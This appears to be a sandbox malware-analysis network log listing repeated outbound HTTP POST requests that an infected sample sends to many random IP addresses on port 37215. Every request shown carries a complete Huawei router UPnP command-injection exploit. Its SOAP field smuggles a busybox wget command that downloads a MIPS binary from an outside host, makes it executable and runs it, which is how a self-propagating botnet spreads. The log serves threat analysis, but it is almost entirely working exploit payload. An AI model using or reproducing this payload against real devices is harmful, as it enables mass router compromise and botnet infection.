                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  823192.168.2.1337974168.207.198.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419585943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  824192.168.2.1339304157.229.80.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419604063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  825192.168.2.134844441.79.195.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419673920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  826192.168.2.1357428157.26.119.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419686079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  827192.168.2.1349000157.187.96.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419704914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  828192.168.2.1341692166.86.183.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419930935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  829192.168.2.1350774197.238.191.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419950962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  830192.168.2.1350066197.9.10.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419965982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  831192.168.2.133719268.48.93.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419991016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  832192.168.2.133796041.192.122.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.420021057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 